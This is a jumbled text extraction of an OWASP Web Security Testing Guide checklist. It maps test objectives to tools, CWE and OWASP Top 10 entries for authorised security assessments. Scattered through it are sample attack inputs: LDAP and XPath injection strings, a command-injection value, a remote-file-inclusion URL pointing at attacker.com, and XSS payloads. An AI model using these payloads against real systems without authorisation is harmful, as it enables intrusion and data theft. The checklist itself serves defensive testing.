Professional Documents
Culture Documents
OWASP WSTG Checklist
OWASP WSTG Checklist
Information Gathering
1.10 WSTG-INFO-10
Symbol
Pass
Issue
N/A
Objectives
- Identify what sensitive design and configuration information of the application, system, or
organization is exposed directly (on the organization's website) or indirectly (via third-party services).
- Determine the version and type of a running web server to enable further discovery of any known
vulnerabilities.
- Identify hidden or obfuscated paths and functionality through the analysis of metadata files
(robots.txt, <META> tag, sitemap.xml)
- Extract and map other information that could lead to a better understanding of the systems at hand.
- Enumerate the applications within the scope that exist on a web server.
- Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone
transfers
- Review webpage comments, metadata, and redirect bodies to find any information leakage.
- Gather JavaScript files and review the JS code to better understand the application and to find any
information leakage.
- Identify if source map files or other front-end debug files exist.
- Identify possible entry and injection points through request and response analysis which covers
hidden fields, parameters, methods HTTP header analysis
- Map the target application and understand the principal workflows.
- Use HTTP(s) Proxy Spider/Crawler feature aligned with application walkthrough
- Fingerprint the components being used by the web applications.
- Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific
files and folders, Error message.
N/A, This content has been merged into: WSTG-INFO-08
- Understand the architecture of the application and the technologies in use.
- Identify application architecture whether on Application and Network components:
Applicaton: Web server, CMS, PaaS, Serverless, Microservices, Static storage, Third party services/APIs
Network and Security: Reverse proxy, IPS, WAF
Tools OWASP Top 10 CWE Result Affected Item Status
Google
Hacking
Shodan NA NA Not started
Recon-ng
Wappalyzer A5 CWE-756
Nikto Not started
A6 CWE-1352
Browser
Curl
Burpsuite/ZAP A1 CWE-200 Not started
dnsrecon
Nmap NA NA Not started
Browser
Curl CWE-200
Burpsuite/ZAP A1 Not started
CWE-540
OWASP ASD
Burpsuite/ZAP NA NA Not started
Burpsuite/ZAP
NA NA Not started
Whatweb
Wappalyzer A5 CWE-756
Not started
CMSMap A6 CWE-1104
NA NA NA Not started
WAFW00F
Nmap
NA NA Not started
2. Configuration and Deploy Management Testing
2.1 WSTG-CONF-01
2.2 WSTG-CONF-02
Symbol
Pass
Issue
N/A
ting
Description Tools
- Review the applications' configurations set across the network and validate that they are not Nessus
vulnerable. Nmap
- Validate that used frameworks and systems are secure and not susceptible to known
vulnerabilities due to unmaintained software or default settings and credentials.
- Ensure that defaults and known files have been removed. Browser
- Review configuration and server handling (40*, 50*) Nikto
- Validate that no debugging code or extensions are left in the production environments. CIS
- Review the logging mechanisms set in place for the application including Log Location, Log Benchmarks
Storage , Log Rotation, Log Access Control, Log Review
- Dirbust sensitive file extensions, or extensions that might contain raw data (*e.g.* scripts, raw Browser
data, credentials, etc.). Nikto
- Find important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc) DirSearch
- Validate that no system framework bypasses exist on the rules set. ffuf
- Find and analyse unreferenced files that might contain sensitive information. Browser
- Check JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of Nikto
filename DirSearch
ffuf
A1 CWE-284
A5 CWE-1349 Not started
A6 CWE-1352
CWE-13
CWE-117
CWE-223
CWE-200
A1
CWE-201
A5 Not started
CWE-489
A9
CWE-532
CWE-548
CWE-651
CWE-778
CWE-200
A1 CWE-425 Not started
CWE-552
CWE-200
A1 CWE-531 Not started
CWE-538
A1 CWE-284
Not started
A4 CWE-419
CWE-650
A5 Not started
CWE-749
A1 CWE-552
Not started
A5 CWE-732
3.5 WSTG-IDNT-05
Symbol
Pass
Issue
N/A
Description Tools
- Identify and document roles used by the application. Burpsuite/
- Attempt to switch, change, or access another role. ZAP
- Review the granularity of the roles and the needs behind the permissions given.
- Verify that the identity requirements for user registration are aligned with Burpsuite/
business and security requirements. ZAP
- Validate the registration process.
- Verify which accounts may provision other accounts and of what type. Burpsuite/
ZAP
- Review processes that pertain to user identification (*e.g.* registration, login, Burpsuite/
etc.). ZAP
- Enumerate users where possible through response analysis.
- Determine whether a consistent account name structure renders the application Burpsuite/
vulnerable to account enumeration. ZAP
- User account names are often highly structured (e.g. Joe Bloggs account name is
jbloggs and Fred Nurks account name is fnurks) and valid account names can easily
be guessed.
- Determine whether the application's error messages permit account
enumeration.
OWASP Top 10 CWE Result Affected Item Status
CWE-266
A4 Not started
CWE-269
CWE-269
A4 Not started
CWE-280
4.2 WSTG-ATHN-02
4.3 WSTG-ATHN-03
4.4 WSTG-ATHN-04
4.6 WSTG-ATHN-06
4.7 WSTG-ATHN-07
Symbol
Pass
Issue
N/A
Description
N/A, This content has been merged into: WSTG-CRYP-03
- Determine whether the application has any User accounts with default passwords.
- Evaluate the account lockout mechanism's ability to mitigate brute force password guessing.
- Evaluate the unlock mechanism's resistance to unauthorized account unlocking.
- Ensure that authentication is applied across all services that require it.
- Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification,
Session ID prediction, SQL Injection
- Validate that the generated session is managed securely and do not put the user's credentials
in danger (e.g., cookie)
- Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off?
- Review if the application stores sensitive information on the client-side.
- Review if access can occur without authorization.
- Check browser history issue by clicking "Back" button after logging out.
- Check browser cache issue from HTTP response headers (Cache-Control: no-cache)
- Determine the resistance of the application against brute Force password guessing using
available password dictionaries by evaluating the length, complexity, reuse, and aging
requirements of passwords.
- Review whether new User accounts are created with weak or predictable passwords.
- Determine the complexity and how straight-forward the questions are (Weak pre-generated
questions, Weak self-generated question)
- Assess possible user answers and brute force capabilities.
- Determine whether the password change and reset functionality allows accounts to be
compromised.
- Test password reset (Display old password in plain-text?, Send via email?, Random token on
confirmation email ?)
- Test password change (Need old password?)
NA NA NA Not started
Browser
Burpsuite/ZAP
Hydra A7 CWE-1392 Not started
Browser
Burpsuite/ZAP
Hydra A7 CWE-307 Not started
Burpsuite/ZAP
CWE-287
CWE-288
CWE-290
CWE-294
A1
CWE-302 Not started
A7
CWE-304
CWE-306
CWE-425
CWE-804
Burpsuite/ZAP CWE-315
A4
CWE-522 Not started
A5
CWE-524
Browser
Burpsuite/ZAP
A4 CWE-525 Not started
Burpsuite/ZAP
Hydra CWE-521
A7 Not started
CWE-1391
Browser
Burpsuite/ZAP A7 CWE-640 Not started
Browser
Burpsuite/ZAP
CWE-620
A7 Not started
CWE-640
Browser
Burpsuite/ZAP A7 CWE-288 Not started
Browser CWE-288
Burpsuite/ZAP A7 CWE-304 Not started
CWE-308
5. Authorization Testing
5.1 WSTG-ATHZ-01
5.2 WSTG-ATHZ-02
5.3 WSTG-ATHZ-03
Symbol
Pass
Issue
N/A
Description Tools OWASP Top 10
- Identify injection points that pertain to path traversal. Burpsuite/
- Assess bypassing techniques and identify the extent of path traversal (dot- ZAP
dot-slash attack, Local/Remote file inclusion) A1
CWE-22
CWE-23
Not started
CWE-35
CWE-829
CWE-285
CWE-732
Not started
CWE-862
CWE-863
CWE-269
Not started
CWE-639
CWE-290
CWE-345 Not started
CWE-798
6. Session Management Testing
6.1 WSTG-SESS-01
6.2 WSTG-SESS-02
6.3 WSTG-SESS-03
6.4 WSTG-SESS-04
6.8 WSTG-SESS-08
Symbol
Pass
Issue
N/A
Description Tools
- Gather session tokens, for the same user and for different users where possible. Burpsuite/
- Analyze and ensure that enough randomness exists to stop session forging attacks. ZAP
- Modify cookies that are not signed and contain information that can be manipulated.
- Ensure that the proper security configuration is set for cookies (HTTPOnly and Secure Burpsuite/
flag, Samesite=Strict) ZAP
- Ensure that proper encryption is implemented (Encryption & Reuse of session Tokens Burpsuite/
vulnerabilities). ZAP
- Review the caching configuration.
- Assess the channel and methods' security (Send sessionID with GET method ?)
- Determine whether it is possible to initiate requests on a user's behalf that are not Burpsuite/
initiated by the user. ZAP
- Conduct URL analysis, Direct access to functions without any token.
- Assess the logout UI. Burpsuite/
- Analyze the session timeout and if the session is properly killed after logout. ZAP
- Validate that a hard session timeout exists, after the timeout has passed, all session Burpsuite/
tokens should be destroyed or be unusable. ZAP
- Identify all session variables. Burpsuite/
- Break the logical flow of session generation. ZAP
- Check whether the application uses the same session variable for more than one
purpose
CWE-315
A2 CWE-330
Not started
A4 CWE-539
CWE-694
CWE-16
CWE-614
A5 Not started
CWE-1004
CWE-1275
CWE-345
A7 CWE-757 Not started
CWE-798
7. Data Validation Testing
7.6 WSTG-INPV-06
7.7 WSTG-INPV-07
7.8 WSTG-INPV-08
7.9 WSTG-INPV-09
7.10 WSTG-INPV-10
7.11 WSTG-INPV-11
7.13 WSTG-INPV-13
7.14 WSTG-INPV-14
7.15 WSTG-INPV-15
7.16 WSTG-INPV-16
Symbol
Pass
Issue
N/A
Description Tools
- Identify variables that are reflected in responses. Burpsuite/ZAP
- Assess the input they accept and the encoding that gets applied on return (if any).
- Identify stored input that is reflected on the client-side. Burpsuite/ZAP
- Assess the input they accept and the encoding that gets applied on return (if any).
N/A, This content has been merged into: WSTG-CONF-06 NA
- Identify the backend and the parsing method used. Burpsuite/ZAP
- Assess injection points and try bypassing input filters using HPP.
- Identify SQL injection points. Burpsuite/ZAP
- Assess the severity of the injection and the level of access that can be achieved through it. SQLMap
NoSQLMap
- Identify LDAP injection points: Burpsuite/ZAP
/ldapsearch?user=*
user=*user=*)(uid=*))(|(uid=*
pass=password
- Assess the severity of the injection:
- Identify SSI injection points (Presense of .shtml extension) with these characters: Burpsuite/ZAP
< ! # = / . " - > and [a-zA-Z0-9]
- Assess the severity of the injection.
- Identify XPATH injection points by checking for XML error enumeration by supplying a Burpsuite/ZAP
single quote ('):
Username: ‘ or ‘1’ = ‘1
Password: ‘ or ‘1’ = ‘1
- Identify IMAP/SMTP injection points (Header, Body, Footer) with special characters (i.e.: \, Burpsuite/ZAP
‘, “, @, #, !, |)
- Understand the data flow and deployment structure of the system.
- Assess the injection impacts.
- Identify injection points where you can inject code into the application. Burpsuite/ZAP
- Check LFI with dot-dot-slash (../../), PHP Wrapper Liffy
(php://filter/convert.base64-encode/resource). LFImap
- Check RFI from malicious URL
?page.php?file=http://attacker.com/malicious_page
- Assess the injection severity.
- Identify and assess the command injection points with special characters (i.e.: | ; & $ > < Burpsuite/ZAP
' !) Commix
For example: ?doc=Doc1.pdf+|+Dir c:\
- Assess whether injecting format string conversion specifiers into user-controlled fields Immunity
causes undesired behavior from the application. Canvas
Spike
MSF
- Identify injections that are stored and require a recall step to the stored injection. (i.e.: Burpsuite/ZAP
CSV Injection, Blind Stored XSS, File Upload) BeEF
- Understand how a recall step could occur.
- Set listeners or activate the recall step if possible.
- Assess if the application is vulnerable to splitting, identifying what possible attacks are Burpsuite/ZAP
achievable.
- Assess if the chain of communication is vulnerable to smuggling, identifying what possible
attacks are achievable.
- Monitor all incoming and outgoing HTTP requests to the Web Server to inspect any Burpsuite/ZAP
suspicious requests.
- Monitor HTTP traffic without changes of end user Browser proxy or client-side application.
- Assess if the Host header is being parsed dynamically in the application. Burpsuite/ZAP
- Bypass security controls that rely on the header. Netcat
- Detect template injection vulnerability points. Burpsuite/ZAP
- Identify the templating engine. Tplmap
- Build the exploit.
- Identify SSRF injection points. Burpsuite/ZAP
- Test if the injection points are exploitable.
- Asses the severity of the vulnerability.
- Identify requests that modify objects Burpsuite/ZAP
- Assess if it is possible to modify fields never intended to be modified from outside
OWASP Top 10 CWE Result Affected Item Status
CWE-91
A5 CWE-611 Not started
CWE-652
CWE-91
A3 Not started
CWE-643
CWE-22
CWE-94
A3 CWE-95 Not started
CWE-98
CWE-829
CWE-77
A3 Not started
CWE-78
A3 CWE-134 Not started
CWE-79
A3 CWE-434 Not started
CWE-1236
CWE-93
A3
CWE-113 Not started
A4
CWE-444
NA NA Not started
CWE-74
A4 Not started
CWE-116
8.1 WSTG-ERRH-01
Symbol
Pass
Issue
N/A
Description
- Identify existing error output (i.e.: Random files/folders (40x)
- Analyze the different output returned.
A5
NA NA
CWE Result Affected Item Status
CWE-209
CWE-210
CWE-431
CWE-497 Not started
CWE-544
CWE-550
CWE-728
NA Not started
9. Cryptography
9.1 WSTG-CRYP-01
9.3 WSTG-CRYP-03
Testing for Weak Encryption
9.4 WSTG-CRYP-04
Symbol
Pass
Issue
N/A
Description Tools OWASP Top 10
- Validate the server configuration (Identify weak ciphers/protocols (ie. RC4, testssl.sh
BEAST, CRIME, POODLE)
- Review the digital certificate's cryptographic strength and validity.
- Ensure that the TLS security is not bypassable and is properly implemented
across the application.
A2
A7
A2
CWE Result Affected Item Status
CWE-295
CWE-296
CWE-297
CWE-298
CWE-319 Not started
CWE-326
CWE-327
CWE-310
CWE-757
CWE-326
Not started
CWE-649
CWE-311
CWE-319 Not started
CWE-523
CWE-261
CWE-320
CWE-321
CWE-322
CWE-323
CWE-324
CWE-325
CWE-326
CWE-327
CWE-328
CWE-329
CWE-330
CWE-331 Not started
CWE-335
CWE-336
CWE-337
CWE-338
CWE-340
CWE-347
CWE-354
CWE-759
CWE-760
CWE-780
CWE-798
CWE-916
10. Business logic Testing
10.1 WSTG-BUSL-01
10.3 WSTG-BUSL-03
10.4 WSTG-BUSL-04
10.5 WSTG-BUSL-05
10.7 WSTG-BUSL-07
Test Upload of Unexpected File Types
10.8 WSTG-BUSL-08
10.9 WSTG-BUSL-09
10.10 WSTG-BUSL-10
Symbol
Pass
Issue
N/A
Description Tools
- Identify data injection points. Burpsuite/
- Validate that all checks are occurring on the back end and can't be bypassed. ZAP
- Attempt to break the format of the expected data and analyze how the application
is handling it.
- Review the project documentation looking for guessable, predictable, or hidden Burpsuite/
functionality of fields. ZAP
- Insert logically valid data in order to bypass normal business logic workflow.
- Review the project documentation for components of the system that move, Burp Proxy
store, or handle data.
- Determine what type of data is logically acceptable by the component and what
types the system should guard against.
- Determine who should be allowed to modify or read that data in each component.
- Attempt to insert, update, or delete data values used by each component that
should not be allowed per the business logic workflow.
- Review the project documentation for system functionality that may be impacted Burpsuite/
by time. Such as execution time or actions that ZAP
help users predict a future outcome or allow one to circumvent
any part of the business logic or workflow. For example, not
completing transactions in an expected time.
- Develop and execute the mis-use cases ensuring that attackers
can not gain an advantage based on any timing (Race Condition).
- Identify functions that must set limits to the times they can be called. Burpsuite/
- Assess if there is a logical limit set on the functions and if it is properly validated. ZAP
- For each of the functions and features found that should only be executed a single
time or specified number of times during the business logic workflow, develop
abuse/misuse cases that may allow a user to execute more than the allowable
number of times.
- Review the project documentation for methods to skip or go through steps in the Burpsuite/
application process in a different order from the intended business logic flow. ZAP
- Develop a misuse case and try to circumvent every logic flow identified.
- Generate notes from all tests conducted against the system. Burpsuite/
- Review which tests had a different functionality based on aggressive input. ZAP
- Understand the defenses in place and verify if they are enough to protect the
system against bypassing techniques.
- Measures that might indicate the application has in-built self-defense:
• Changed responses
• Blocked requests
• Actions that log a user out or lock their account
- Review the project documentation for file types that are rejected by the system. Burpsuite/
- Verify that the unwelcomed file types are rejected and handled safely. Also, check ZAP
whether the website only check for "Content-type" or file extension.
- Verify that file batch uploads are secure and do not allow any bypass against the
set security measures.
- Determine whether the business logic for the e-commerce functionality is robust. Burpsuite/
- Understand how the payment functionality works. ZAP
- Determine whether the payment functionality is secure.
OWASP Top 10 CWE Result Affected Item Status
CWE-840
A4 Not started
CWE-472
CWE-840
A4 Not started
CWE-362
A4
CWE-799 Not started
A7
CWE-472
A4 CWE-602 Not started
CWE-807
11. Client Side Testing
11.4 WSTG-CLNT-04
11.9 WSTG-CLNT-09
Testing WebSockets
11.10 WSTG-CLNT-10
11.12 WSTG-CLNT-12
Pass
Issue
N/A
Description Tools OWASP Top 10
- Identify DOM sinks. Burpsuite/
- Build payloads that pertain to every sink type. ZAP A3
For example: #<script>alert('xss')</script>
- Identify sinks and possible JavaScript injection points. Burpsuite/
For example: ?javascript:alert(1) ZAP A3
- Identify HTML injection points and assess the severity of the injected Burpsuite/
content. ZAP A3
For example: page.html?user=<img%20src='aaa'%20onerror=alert(1)>
- Identify injection points that handle URLs or paths. Burpsuite/
- Assess the locations that the system could redirect to (Open Redirect). ZAP
For example: ?redirect=www.fake-target.site A4
CWE-319
Not started
CWE-1347
CWE-312
CWE-313
Not started
CWE-315
CWE-922
Definition
Symbol
Pass Requirement is applicable to mobile App and implemented
Issue according to best
Requirement practices.to mobile App but not fulfilled.
is applicable
N/A Requirement is not applicable to mobile App.
Description Tools
- Assess that a secure and production-ready configuration is deployed. Burpsuite/ZAP
- Validate all input fields against generic attacks. GraphSQL Raider
- Ensure that proper access controls are applied.
OWASP Top 10 CWE Result Affected Item Status
WSTG - Cryptography
WSTG - Business logic Testing
1 WSTG-INFO-001 High
OWASP Top 10
Likelihood Impact Observation and Implication
Mapping
Moderate High
Recommendation Test Evidence
OWASP Risk Assessment Calculator
Risk Assessment Calculator
Likelihood factors
Threat Agent Factors
Skills required Some technical skills [3] 3
Motive Possible reward [4] 4
Opportunity Special access or resources required [4] 4
Population Size Partners [5] 5
Vulnerability Factors
Easy of Discovery Automated tools available [9] 9
Ease of Exploit Automated tools available [9] 9
Awareness Hidden [4] 4
Intrusion Detection Logged without review [8] 8